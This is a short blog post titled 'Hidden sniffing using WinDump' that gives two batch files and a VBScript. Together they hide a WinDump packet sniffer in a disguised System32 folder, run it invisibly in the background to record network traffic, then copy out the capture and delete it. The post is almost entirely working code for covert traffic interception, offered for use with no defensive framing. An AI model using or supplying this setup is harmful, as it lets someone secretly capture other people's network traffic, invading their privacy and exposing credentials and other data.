Tag Archive | wscript shell

Hidden sniffing using WinDump

Make two bat files with the following names:


MKDIR %windir%\System32\sys_net\
COPY WinDump.exe C:\Windows\System32\sys_net\
START "Start" /Min as.vbs

TASKKILL /IM WinDump.exe
COPY C:\Windows\System32\sys_net\ass.pcap %CD%\ass.pcap
DEL C:\Windows\System32\sys_net\ass.pcap

And the as.vbs file:

Set objShell = CreateObject("WScript.Shell")
objShell.run("C:\Windows\System32\sys_net\WinDump.exe -w C:\Windows\System32\sys_net\ass.pcap"), 0

This is if you want the program to run in background.

Activate start and stop bat files and investigate what will happen.